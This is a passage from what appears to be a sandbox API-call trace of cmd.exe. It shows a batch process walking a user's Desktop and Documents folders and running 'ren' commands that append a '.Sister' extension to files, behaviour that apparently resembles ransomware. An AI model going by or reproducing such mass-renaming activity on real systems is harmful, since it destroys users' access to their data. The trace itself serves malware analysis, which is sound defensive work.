ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc73c0 [0304.622] FindClose (in: hFindFile=0x21ed8cc73c0 | out: hFindFile=0x21ed8cc73c0) returned 1 [0304.623] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc79c0 [0304.623] FindClose (in: hFindFile=0x21ed8cc79c0 | out: hFindFile=0x21ed8cc79c0) returned 1 [0304.623] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8cc7180 [0304.623] FindClose (in: hFindFile=0x21ed8cc7180 | out: hFindFile=0x21ed8cc7180) returned 1 [0304.623] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0304.624] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.624] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0304.624] GetProcessHeap () returned 0x21ed8c70000 [0304.624] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d670b0 [0304.624] ??_V@YAXPEAX@Z () returned 0x1 [0304.624] ??_V@YAXPEAX@Z () returned 0x1 [0304.624] GetProcessHeap () returned 0x21ed8c70000 [0304.624] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d296c0, Size=0x490) returned 0x21ed8d296c0 [0304.624] GetProcessHeap () returned 0x21ed8c70000 [0304.624] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d296c0) returned 0x490 [0304.624] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0304.624] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.624] GetFileType (hFile=0x50) returned 0x2 [0304.624] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.624] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0304.626] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.626] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0304.634] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.634] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0304.634] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0304.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.634] GetFileType (hFile=0x50) returned 0x2 [0304.635] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.635] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0304.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.635] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0304.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.636] GetFileType (hFile=0x50) returned 0x2 [0304.636] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.636] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0304.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.636] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d29690*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d29690*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0304.637] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0304.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.637] GetFileType (hFile=0x50) returned 0x2 [0304.637] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.637] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0304.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.637] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0304.644] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0304.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.644] GetFileType (hFile=0x50) returned 0x2 [0304.644] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.644] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0304.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.645] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0304.650] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0304.650] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0304.651] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0304.651] malloc (_Size=0xffce) returned 0x21eda1bfe80 [0304.651] ??_V@YAXPEAX@Z () returned 0x21eda1bfe80 [0304.651] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0304.651] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0304.651] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0304.651] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0304.651] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0304.651] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0304.651] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0304.651] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0304.651] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0304.651] ??_V@YAXPEAX@Z () returned 0x1 [0304.651] GetProcessHeap () returned 0x21ed8c70000 [0304.651] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5fe40 [0304.651] GetProcessHeap () returned 0x21ed8c70000 [0304.651] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5fe40, Size=0x130) returned 0x21ed93b1bb0 [0304.652] GetProcessHeap () returned 0x21ed8c70000 [0304.652] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b1bb0) returned 0x130 [0304.652] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0304.652] malloc (_Size=0xffce) returned 0x21eda1bfe80 [0304.652] ??_V@YAXPEAX@Z () returned 0x21eda1bfe80 [0304.652] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0304.652] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda1bfe80, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0304.657] ??_V@YAXPEAX@Z () returned 0x1 [0304.657] GetProcessHeap () returned 0x21ed8c70000 [0304.657] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed93b21f0 [0304.657] GetProcessHeap () returned 0x21ed8c70000 [0304.657] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5eda0 [0304.657] GetProcessHeap () returned 0x21ed8c70000 [0304.657] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5eda0, Size=0x130) returned 0x21ed93b1430 [0304.657] GetProcessHeap () returned 0x21ed8c70000 [0304.657] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b1430) returned 0x130 [0304.658] malloc (_Size=0xffce) returned 0x21eda1bfe80 [0304.658] ??_V@YAXPEAX@Z () returned 0x21eda1bfe80 [0304.658] GetProcessHeap () returned 0x21ed8c70000 [0304.658] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc77e0 [0304.658] GetProcessHeap () returned 0x21ed8c70000 [0304.658] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5c4d0 [0304.658] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0304.658] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0304.658] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.658] GetLastError () returned 0x2 [0304.658] GetProcessHeap () returned 0x21ed8c70000 [0304.658] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92a0060 [0304.658] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed92a0070 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.659] SetErrorMode (uMode=0x0) returned 0x0 [0304.659] SetErrorMode (uMode=0x1) returned 0x0 [0304.659] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda1bfe80, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0304.659] SetErrorMode (uMode=0x0) returned 0x1 [0304.659] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0304.659] GetProcessHeap () returned 0x21ed8c70000 [0304.659] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5c740 [0304.659] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0304.659] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0304.659] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.659] GetLastError () returned 0x2 [0304.659] ??_V@YAXPEAX@Z () returned 0x1 [0304.659] malloc (_Size=0xffce) returned 0x21eda1bfe80 [0304.660] ??_V@YAXPEAX@Z () returned 0x21eda1bfe80 [0304.660] malloc (_Size=0xffce) returned 0x21eda1cfe60 [0304.660] ??_V@YAXPEAX@Z () returned 0x21eda1cfe60 [0304.660] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.660] GetLastError () returned 0x2 [0304.660] _get_osfhandle (_FileHandle=2) returned 0x54 [0304.660] GetFileType (hFile=0x54) returned 0x2 [0304.660] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0304.660] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0304.666] _get_osfhandle (_FileHandle=2) returned 0x54 [0304.666] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0304.666] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0304.666] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0304.666] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0304.677] longjmp () [0304.678] ??_V@YAXPEAX@Z () returned 0x1 [0304.678] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef9ff870, ftCreationTime.dwHighDateTime=0x1d5a413, ftLastAccessTime.dwLowDateTime=0xf8e32f80, ftLastAccessTime.dwHighDateTime=0x1d59f0c, ftLastWriteTime.dwLowDateTime=0xf8e32f80, ftLastWriteTime.dwHighDateTime=0x1d59f0c, nFileSizeHigh=0x0, nFileSizeLow=0x7df8, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="m-Z5Dsoldvd.pptx", cAlternateFileName="")) returned 1 [0304.678] GetProcessHeap () returned 0x21ed8c70000 [0304.678] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758a0, Size=0x144) returned 0x21ed8c758a0 [0304.678] GetProcessHeap () returned 0x21ed8c70000 [0304.678] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x144 [0304.678] GetProcessHeap () returned 0x21ed8c70000 [0304.678] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d29b60 [0304.678] GetProcessHeap () returned 0x21ed8c70000 [0304.678] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d29b60, Size=0x30) returned 0x21ed8d29b60 [0304.678] GetProcessHeap () returned 0x21ed8c70000 [0304.678] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d29b60) returned 0x30 [0304.678] GetProcessHeap () returned 0x21ed8c70000 [0304.678] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d29ba0 [0304.679] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.679] GetProcessHeap () returned 0x21ed8c70000 [0304.679] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x32) returned 0x21ed8cc8d10 [0304.679] ??_V@YAXPEAX@Z () returned 0x1 [0304.679] GetProcessHeap () returned 0x21ed8c70000 [0304.679] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d29ba0, Size=0x180) returned 0x21ed8d29ba0 [0304.679] GetProcessHeap () returned 0x21ed8c70000 [0304.679] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d29ba0) returned 0x180 [0304.679] GetProcessHeap () returned 0x21ed8c70000 [0304.679] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d29d30 [0304.679] GetProcessHeap () returned 0x21ed8c70000 [0304.679] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d29d30, Size=0x290) returned 0x21ed8d29d30 [0304.679] GetProcessHeap () returned 0x21ed8c70000 [0304.679] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d29d30) returned 0x290 [0304.679] GetProcessHeap () returned 0x21ed8c70000 [0304.679] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d29fd0 [0304.679] GetProcessHeap () returned 0x21ed8c70000 [0304.679] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d29fd0, Size=0x30) returned 0x21ed8d29fd0 [0304.679] GetProcessHeap () returned 0x21ed8c70000 [0304.680] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d29fd0) returned 0x30 [0304.680] GetProcessHeap () returned 0x21ed8c70000 [0304.680] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2a010 [0304.680] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.680] GetProcessHeap () returned 0x21ed8c70000 [0304.680] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x32) returned 0x21ed8cc8bd0 [0304.680] ??_V@YAXPEAX@Z () returned 0x1 [0304.680] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.680] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7060 [0304.680] FindClose (in: hFindFile=0x21ed8cc7060 | out: hFindFile=0x21ed8cc7060) returned 1 [0304.680] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc78a0 [0304.681] FindClose (in: hFindFile=0x21ed8cc78a0 | out: hFindFile=0x21ed8cc78a0) returned 1 [0304.681] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe02cb749, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe02cb749, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8cc7720 [0304.681] FindClose (in: hFindFile=0x21ed8cc7720 | out: hFindFile=0x21ed8cc7720) returned 1 [0304.681] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0304.681] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\m-Z5Dsoldvd.pptx", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef9ff870, ftCreationTime.dwHighDateTime=0x1d5a413, ftLastAccessTime.dwLowDateTime=0xf8e32f80, ftLastAccessTime.dwHighDateTime=0x1d59f0c, ftLastWriteTime.dwLowDateTime=0xf8e32f80, ftLastWriteTime.dwHighDateTime=0x1d59f0c, nFileSizeHigh=0x0, nFileSizeLow=0x7df8, dwReserved0=0x4, dwReserved1=0x7, cFileName="m-Z5Dsoldvd.pptx", cAlternateFileName="M-Z5DS~1.PPT")) returned 0x21ed8cc7780 [0304.681] FindClose (in: hFindFile=0x21ed8cc7780 | out: hFindFile=0x21ed8cc7780) returned 1 [0304.682] _wcsnicmp (_String1="M-Z5DS~1.PPT", _String2="m-Z5Dsoldvd.pptx", _MaxCount=0x10) returned 15 [0304.682] malloc (_Size=0x1ff9c) returned 0x21eda1dfe40 [0304.683] ??_V@YAXPEAX@Z () returned 0x21eda1dfe40 [0304.684] GetProcessHeap () returned 0x21ed8c70000 [0304.684] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x28) returned 0x21ed8d45c80 [0304.684] ??_V@YAXPEAX@Z () returned 0x1 [0304.684] ??_V@YAXPEAX@Z () returned 0x1 [0304.684] GetProcessHeap () returned 0x21ed8c70000 [0304.685] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2a010, Size=0x178) returned 0x21ed8d2a010 [0304.685] GetProcessHeap () returned 0x21ed8c70000 [0304.685] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2a010) returned 0x178 [0304.685] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0304.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.685] GetFileType (hFile=0x50) returned 0x2 [0304.685] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.685] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0304.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.685] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0304.690] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.690] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0304.690] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0304.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.690] GetFileType (hFile=0x50) returned 0x2 [0304.690] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.690] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0304.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.693] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0304.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.694] GetFileType (hFile=0x50) returned 0x2 [0304.694] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.694] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.694] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d29b70*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d29b70*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.695] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"m-Z5Dsoldvd.pptx\" \"m-Z5Dsoldvd.pptx.Sister\" ") returned 46 [0304.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.695] GetFileType (hFile=0x50) returned 0x2 [0304.695] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.695] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.695] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2e, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x2e) returned 1 [0304.696] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0304.696] _get_osfhandle (_FileHandle=1) returned 